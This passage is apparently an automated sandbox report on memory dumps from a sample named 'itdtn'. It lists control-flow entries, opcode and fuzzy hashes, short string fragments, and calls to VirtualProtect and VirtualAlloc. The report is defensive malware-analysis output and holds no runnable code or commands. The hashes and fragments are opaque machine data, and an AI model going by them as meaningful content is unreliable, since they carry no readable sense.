5b09ba0 call 5b0c6a0 1193->1263 1194->1177 1205->1154 1235->1182 1236->1235 1256->1160 1257->1256 1260->1151 1261->1151 1262->1192 1263->1192
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q$4']q$4']q
                                                • API String ID: 0-705557208
                                                • Opcode ID: 6546622b453f3ebfef8473f88c37637b392d96cb94828ae83ba7a3829de4da32
                                                • Instruction ID: 079831b55e5906bf3e5e9b6afa37ffe765e146d2c502606a7edf5654b57ea2d8
                                                • Opcode Fuzzy Hash: 6546622b453f3ebfef8473f88c37637b392d96cb94828ae83ba7a3829de4da32
                                                • Instruction Fuzzy Hash: B3F19734B10218DFCB18DB64D998AADBBB2FF89300F558594E406AB3A5DB71FD42CB50

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq$(aq$Haq
                                                • API String ID: 0-2456560092
                                                • Opcode ID: 3cce25c4c3c87ee9fffe780dc383e2f463ef2ea9c8106ecec52302d23b96112f
                                                • Instruction ID: 1829f2a015b894ab8ea9580d6622888054423f070263ba60394769b056322a9c
                                                • Opcode Fuzzy Hash: 3cce25c4c3c87ee9fffe780dc383e2f463ef2ea9c8106ecec52302d23b96112f
                                                • Instruction Fuzzy Hash: 73E10134A002099FCB04DF64D4949ADBFB2FF89310F5485A9E806AB3A5DB34FD46CB51

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq$d
                                                • API String ID: 0-3557608343
                                                • Opcode ID: 3c5864d7cccf91052ba1c98cdbb426e63f8d98ccb5333780e809f24b8a7b35cd
                                                • Instruction ID: bbbc53b336c006b3891f41dbf244199914c82b4fe32bfb9e133f0edb930f9893
                                                • Opcode Fuzzy Hash: 3c5864d7cccf91052ba1c98cdbb426e63f8d98ccb5333780e809f24b8a7b35cd
                                                • Instruction Fuzzy Hash: B3D15C306006068FCB14DF29C48496EFBF6FF89320B55D9A9D45A9B3A5DB34F846CB90

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq$Haq
                                                • API String ID: 0-3785302501
                                                • Opcode ID: d5aede8f78794eef48e71cb8686e33e4a37746004d2d47a0e145b679b05f3a92
                                                • Instruction ID: baa760ea8dbe673ab58e0a2cc9fcc681f72cf55a979ec480edd73bbf8afa8fb0
                                                • Opcode Fuzzy Hash: d5aede8f78794eef48e71cb8686e33e4a37746004d2d47a0e145b679b05f3a92
                                                • Instruction Fuzzy Hash: 3D517B347006058FC759AF29C49892EBFB3FF9921075044ADD8069B3A5DF35ED06CBA1

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,$=
                                                • API String ID: 0-1737935649
                                                • Opcode ID: ca6f12064d07923478139dc95189c7dc8c599de7ec434056d8b7890d4c6ffe60
                                                • Instruction ID: bff525cb3f0ae5fbcbf8e049942ee1b186beab7484542855f4551df2acc699db
                                                • Opcode Fuzzy Hash: ca6f12064d07923478139dc95189c7dc8c599de7ec434056d8b7890d4c6ffe60
                                                • Instruction Fuzzy Hash: BEF0493494411ACFEB60DB54D8487EA7AB5EF04354F1140E6900993651DB784A888F12
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,aq
                                                • API String ID: 0-3092978723
                                                • Opcode ID: fc9d112d37b1b043774719162aa37e8822f5e9830bd51aca19bce6a92c56da2a
                                                • Instruction ID: ffee5492e3a58a131037351e1993cf902e21fabfbc74835e59d04a9bfed2e5cb
                                                • Opcode Fuzzy Hash: fc9d112d37b1b043774719162aa37e8822f5e9830bd51aca19bce6a92c56da2a
                                                • Instruction Fuzzy Hash: 52521A75A002288FCB64DF69C981BDDBBF6BF88300F1545D9E509A73A5DA30AD81CF61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q
                                                • API String ID: 0-1007455737
                                                • Opcode ID: 8bb3a9df5a61cb73e8184f182f0d317132219897ca6b47e0119effd422e490f9
                                                • Instruction ID: 1bed0e61a2bcb6d7e1c9457b5a741ee5694336ec6b485ffdaa8dde2f56e1689e
                                                • Opcode Fuzzy Hash: 8bb3a9df5a61cb73e8184f182f0d317132219897ca6b47e0119effd422e490f9
                                                • Instruction Fuzzy Hash: 07E1BB717042028FDB649F29C49566E7FF2FFD5210F6440EAE882CB3E5DA34E9818B56
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05D2DC14
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246264025.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5d20000_itdtn.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 465d9ab7012fba8683cec0f7d8c70954887ab73b300aad4dce4f81570f956fe0
                                                • Instruction ID: 2cf6d35b746832321584c34eb2c0fd92a3fd25f022b8e66ca7bbc79ed4437169
                                                • Opcode Fuzzy Hash: 465d9ab7012fba8683cec0f7d8c70954887ab73b300aad4dce4f81570f956fe0
                                                • Instruction Fuzzy Hash: F131A8B8D002589FCB10DFA9D980A9EFBB1BF59310F14942AE819B7210D775A945CF94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q
                                                • API String ID: 0-1259897404
                                                • Opcode ID: d0f0973b687fe82f8b193e20dc0ea55967b8451fe2d6b574b4fbc4276ffd93ec
                                                • Instruction ID: c6d018829c2e8e843c1299cc90a3f0fa83e31381f4cc8335b34e1d81cd3cd938
                                                • Opcode Fuzzy Hash: d0f0973b687fe82f8b193e20dc0ea55967b8451fe2d6b574b4fbc4276ffd93ec
                                                • Instruction Fuzzy Hash: 04A1B834B10218DFCB04DFA4D9989ADBBB2FF89300F559599E406AB3A5DB30BD42CB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq
                                                • API String ID: 0-600464949
                                                • Opcode ID: 4f9634ed714989510cc04ece1020d712b4b2272d6dd80578f6609b4bb2bd95f9
                                                • Instruction ID: 52cb7f915f7eda1257b2ad6072881f13f37ac6f8fac95f731ab85c999416ba76
                                                • Opcode Fuzzy Hash: 4f9634ed714989510cc04ece1020d712b4b2272d6dd80578f6609b4bb2bd95f9
                                                • Instruction Fuzzy Hash: 1A41A132704240AFCB469F68D814D69BFB6FF89310B1980EAE605CB3B2CA31EC11DB51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q
                                                • API String ID: 0-1259897404
                                                • Opcode ID: 91ff20c5a44ed71999a8958e53c721a31a704d7a872ed998a696dfc94bb12d34
                                                • Instruction ID: 5f15427f7a0a9fc1ba9613124598f77f59dd5093fb5c5c86848f33c18b042b97
                                                • Opcode Fuzzy Hash: 91ff20c5a44ed71999a8958e53c721a31a704d7a872ed998a696dfc94bb12d34
                                                • Instruction Fuzzy Hash: 6A313B713406009FD708DB29C959F2ABBEAAF89B04F1045A8E50A8B3A5DF75FC42C795
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q
                                                • API String ID: 0-1259897404
                                                • Opcode ID: a84a8977f04fcd3b93e11c098fb457529837cf070e090ae758412654253229ce
                                                • Instruction ID: 01cd8eaf2a70c8ba9c96760ea0c1bb7fc003eff179e3c4181a05184416c6484b
                                                • Opcode Fuzzy Hash: a84a8977f04fcd3b93e11c098fb457529837cf070e090ae758412654253229ce
                                                • Instruction Fuzzy Hash: 0E313B753406009FD308DB69C998F2ABBEAAF89710F1045A8E50A8B3A5DE75FC42C794
                                                APIs
                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 05D2EDD7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246264025.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5d20000_itdtn.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 7624eabd77d150d7d085dddbdf0d690a0cd4d83c279bb27a0080d98b263960a4
                                                • Instruction ID: 7ce03631373376c72d7afe7465e0ed4a679d64115a949f3f480751a393070679
                                                • Opcode Fuzzy Hash: 7624eabd77d150d7d085dddbdf0d690a0cd4d83c279bb27a0080d98b263960a4
                                                • Instruction Fuzzy Hash: EC3199B8D002589FCB10CFA9D980AAEFBB5FF59310F14942AE815B7310D735A945CF94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q
                                                • API String ID: 0-1259897404
                                                • Opcode ID: ff03e3516944261d3e87a00cf2405305b5753f5d58c3a231ca60d03175e36f9c
                                                • Instruction ID: 8055c16f78e07ee500aeded8e85317e578db6601c19e3e8039a3aced15d06748
                                                • Opcode Fuzzy Hash: ff03e3516944261d3e87a00cf2405305b5753f5d58c3a231ca60d03175e36f9c
                                                • Instruction Fuzzy Hash: 8A3180327002049FCB459F58D954D69BFF6FF88310B4544A9EA06AB3A5EA32EC02CB55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p<]q
                                                • API String ID: 0-1327301063
                                                • Opcode ID: c04bab9c57845e262a20b0884a7d76a0bd31594f15a8c7830dbc15fa1233a5ae
                                                • Instruction ID: 5b562e00eace2a12cfea6448d0381212d287acbdd24e24bbc5762ae155bb9e49
                                                • Opcode Fuzzy Hash: c04bab9c57845e262a20b0884a7d76a0bd31594f15a8c7830dbc15fa1233a5ae
                                                • Instruction Fuzzy Hash: 77213A703045549FCB05CF2AD844AAA7FFAFF8A211B0944A5FC46CB2B1CA75EC51CB60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p<]q
                                                • API String ID: 0-1327301063
                                                • Opcode ID: c8e48a0c772a9493980b8d5fe389c1a74d94945da15baab55d81e1bc04115d61
                                                • Instruction ID: 79b10617a94b57d948d8f2ae0634242551f9f812955b076f096eb269b0561337
                                                • Opcode Fuzzy Hash: c8e48a0c772a9493980b8d5fe389c1a74d94945da15baab55d81e1bc04115d61
                                                • Instruction Fuzzy Hash: 492137313045449FCB05DF2AD844AAA7FEAFF8A610F0944A5F846CB2B1CB35EC51CB20
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7e13298fe696ca5e47e8b47eef359f3f6f76bf6e305ef1b9322fa0db3de8078
                                                • Instruction ID: 3cb26869337de0fa92314bc1d475b3c35185ec9ffd908fddf022f9a642aa5f43
                                                • Opcode Fuzzy Hash: e7e13298fe696ca5e47e8b47eef359f3f6f76bf6e305ef1b9322fa0db3de8078
                                                • Instruction Fuzzy Hash: AC12EA34B102198FCB14EF64C894A9DBBB2FF89300F5195A8D54AAB3A5DF70ED85CB50
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a23d09331a03ceec952c9505e996c2f2ddadc3aa16238cabb6f141e93e8c4c81
                                                • Instruction ID: 38b43d1ff0603b2db964b3e707af812282ee98a9d47efb8580fcfb9cbf9fcab1
                                                • Opcode Fuzzy Hash: a23d09331a03ceec952c9505e996c2f2ddadc3aa16238cabb6f141e93e8c4c81
                                                • Instruction Fuzzy Hash: 05813834B10214DFCB04EF68D498A6DBBB6FF88610F5485A9E5069B3A5DB30EC42CB90
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 646d5d6da684195de6b30abbc9c1995db9ab9e85158940ebae18515c2b7409ca
                                                • Instruction ID: 86f6e1b385bb087ed2af7378415a98e663c1cc4e5105e744f153a7f27450feb2
                                                • Opcode Fuzzy Hash: 646d5d6da684195de6b30abbc9c1995db9ab9e85158940ebae18515c2b7409ca
                                                • Instruction Fuzzy Hash: EE11F774A02229CFDB64DF55E8A4AEEBBB5FB58340F1040EAE409A7740DB749E85CF40
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e38646959b90d86a7eca9bbacdf5b034fb80228fb84726fabb0e07fe692f0aa
                                                • Instruction ID: af67ae2b9e94578a6665836c674c1c28703a3e6637b4bcb5f3c3f96dc37e81b0
                                                • Opcode Fuzzy Hash: 9e38646959b90d86a7eca9bbacdf5b034fb80228fb84726fabb0e07fe692f0aa
                                                • Instruction Fuzzy Hash: DDF049363507009FC7049B29D855E6ABBAAEFC9721F1580A9F946CB3A1CE31EC01CB54
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 19fdf153ad82a6eb3069e3599160c393225dbb8c300f330c84ad4618dd11905f
                                                • Instruction ID: cfb5b1287de9763929e01d9dc43d66d05801989fe66f9904db76cf34c2481cab
                                                • Opcode Fuzzy Hash: 19fdf153ad82a6eb3069e3599160c393225dbb8c300f330c84ad4618dd11905f
                                                • Instruction Fuzzy Hash: 84F03A353502009FC3049B19D854D7ABBEAEFC8721B1484A9F9068B3A0CE31EC02CB90
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 765f3be1abf0d6793c5358ce76d7dee52a86cf06aaf31bdb04391165fa08c9df
                                                • Instruction ID: 16adae48cfcf6e0d1c1e6e9fdec6c3a7f0cab863f787a06145d983731b6c452a
                                                • Opcode Fuzzy Hash: 765f3be1abf0d6793c5358ce76d7dee52a86cf06aaf31bdb04391165fa08c9df
                                                • Instruction Fuzzy Hash: A3010478A452298FDB64DF24DC98A99BBB1FB58300F1041EAE40DE3350DB349E81CF00
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c5f0cf0f70b4a5afc46e8a05ef1f7b77762264402a7d59968d8eaac50a62d407
                                                • Instruction ID: 327b1141b3e0a5e0edc09463d99eedcbd1587794aa88130a7207aa551beda1d3
                                                • Opcode Fuzzy Hash: c5f0cf0f70b4a5afc46e8a05ef1f7b77762264402a7d59968d8eaac50a62d407
                                                • Instruction Fuzzy Hash: A0E0D82671932183E761162F3844B3BDE95EB8A920FC045BDFC29D7288CE509D028794
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c78206dc945cf92b2a34ce6faea44e99a6218b84fa55d0626fb814678c612d8e
                                                • Instruction ID: d6f45dd643a01f61933607e31372f1cb84fafe2413f788beb07818eb83f9bdf0
                                                • Opcode Fuzzy Hash: c78206dc945cf92b2a34ce6faea44e99a6218b84fa55d0626fb814678c612d8e
                                                • Instruction Fuzzy Hash: 9EF0A0322043455BC7049B2AFC84D4BFFAEEFC0210B94CA3AE00A87225DB74EC0AC794
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4abae22d35b2befac84b3e6b1538f813bb430a1de04e3d635c951cf15007679e
                                                • Instruction ID: 2fdd6e0906e3464b828f96263ec9c92b0fd90d43881d76f79f9ed039b2142b11
                                                • Opcode Fuzzy Hash: 4abae22d35b2befac84b3e6b1538f813bb430a1de04e3d635c951cf15007679e
                                                • Instruction Fuzzy Hash: 64F03036700519BBC710DA4AD885E62FBA9FB84360B95C165E909D7241C731FC52C7E4
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29f91fccefe1514bb9a4b5c1dde7d3638e578da0898dcfdc0af9ed3587256256
                                                • Instruction ID: 469f2e84255940c491ea9ea8be552d19f06d938f0e032409d508163eff7a85a0
                                                • Opcode Fuzzy Hash: 29f91fccefe1514bb9a4b5c1dde7d3638e578da0898dcfdc0af9ed3587256256
                                                • Instruction Fuzzy Hash: A7F01C74D05248EFCB90EFA8D940AADBFF8AB48311F14C1EAE858D3341D6359A51DF50
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 47b15082a849585ccc0af7290ae97af03785cb1fb5ca8b839a9c1532972a975c
                                                • Instruction ID: 72c1205883ec12f419cb813aab00a9f18921a8f22f8b8d18908f5da4355be18d
                                                • Opcode Fuzzy Hash: 47b15082a849585ccc0af7290ae97af03785cb1fb5ca8b839a9c1532972a975c
                                                • Instruction Fuzzy Hash: CDF06571E04218AFCB09EB58D48D7EDBFB6EB84621F44C095E007D3290EF705A82CB94
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7e2b1e86efcc40bf0c947b8ce9a85babdcc630cd119a47d374145d1d71712f5
                                                • Instruction ID: 81ac26bcff42b9a188cc6ce4fc65863ae9de82b7b4a273a74d284292fc2456d8
                                                • Opcode Fuzzy Hash: e7e2b1e86efcc40bf0c947b8ce9a85babdcc630cd119a47d374145d1d71712f5
                                                • Instruction Fuzzy Hash: 61F06D71E04218AFCB09EB98D44C7EDBFB6EB84620F04C099E00793290EF701A82CB94
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a68d1e39f9c10defe6c0c796be96a9e71d2e4a02b16f34bc173471d07c6187c
                                                • Instruction ID: 46d2a265cbc46cd09374dbcf47c68c578aacaa6941ea2fc452b7aeb1b13d42b7
                                                • Opcode Fuzzy Hash: 5a68d1e39f9c10defe6c0c796be96a9e71d2e4a02b16f34bc173471d07c6187c
                                                • Instruction Fuzzy Hash: DEE01A313043095BCB149A1AF884C4BFF9EEEC0264710CA3AA10A87229DE74ED4AC694
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7a145678c68de5afd711f3a6292a144c4b599ce18a3f13651dad0f9577a81ee
                                                • Instruction ID: 504edcea1c4b41517f2dbfc65e7e74a4a2f5a021368c4bf1048011def5968846
                                                • Opcode Fuzzy Hash: f7a145678c68de5afd711f3a6292a144c4b599ce18a3f13651dad0f9577a81ee
                                                • Instruction Fuzzy Hash: 17E0C974D05208EFCB54DFA8D54469CBBF5EB48311F10C1A99809A3351D6359A51DF84
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7a145678c68de5afd711f3a6292a144c4b599ce18a3f13651dad0f9577a81ee
                                                • Instruction ID: c0721e98d90fe37b4c9ccc08b920f271a14bd8546a2a3bd97c668f2b752d57dc
                                                • Opcode Fuzzy Hash: f7a145678c68de5afd711f3a6292a144c4b599ce18a3f13651dad0f9577a81ee
                                                • Instruction Fuzzy Hash: CDE0C274E09208EFCB94DFA8D940AACBBF5EB48310F10C1AA9809A3355D6369A51DF80
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b204a46dc6c3d5860a67d643bf9f51b5f56c8f6a483d639fcde719f0a6818533
                                                • Instruction ID: dd443f7c3fc17aaaf119b2410d59c80856ace3ff8bcb1e86eb506e3340b5887e
                                                • Opcode Fuzzy Hash: b204a46dc6c3d5860a67d643bf9f51b5f56c8f6a483d639fcde719f0a6818533
                                                • Instruction Fuzzy Hash: CCF03A74A00218CFEB54DF64C884E9E7BB2FB58310F1041D6D009A3354CE705E818F90
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7a145678c68de5afd711f3a6292a144c4b599ce18a3f13651dad0f9577a81ee
                                                • Instruction ID: a9fe850dff31a3cc92dde242954ab3d96bd3779cc87dfda74e94dca64b22f8c4
                                                • Opcode Fuzzy Hash: f7a145678c68de5afd711f3a6292a144c4b599ce18a3f13651dad0f9577a81ee
                                                • Instruction Fuzzy Hash: 80E0C974D05208EFCB54DFA8D54169CBBF5EB88311F14C1A9D81993351D6359A51DF40
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7dbef9be145dbea457313e318bde6b9d54ce6d5c512733a520780db2715fb817
                                                • Instruction ID: 5010b4c3728a72bc09809c592db941c3226d0522e921db8f45dd098c32612185
                                                • Opcode Fuzzy Hash: 7dbef9be145dbea457313e318bde6b9d54ce6d5c512733a520780db2715fb817
                                                • Instruction Fuzzy Hash: DAE08C31784308AFCB64B664880DB72BADAAF45615F6418EAE6079B2C0DD62F8018361
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ef2bf72ca8ab3ed36a02a7d178e5406dbbc8f069351aaa815bf815d3517dc31
                                                • Instruction ID: 3767d5486c87516c743a4cef646b7ee10076e1e4541ac40b80a2eb2eea5fa0d7
                                                • Opcode Fuzzy Hash: 8ef2bf72ca8ab3ed36a02a7d178e5406dbbc8f069351aaa815bf815d3517dc31
                                                • Instruction Fuzzy Hash: 1BF0A079801228CFDF20CF20C948BD8BBB2EB04314F9042D6C44993281D7380E82DF00
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
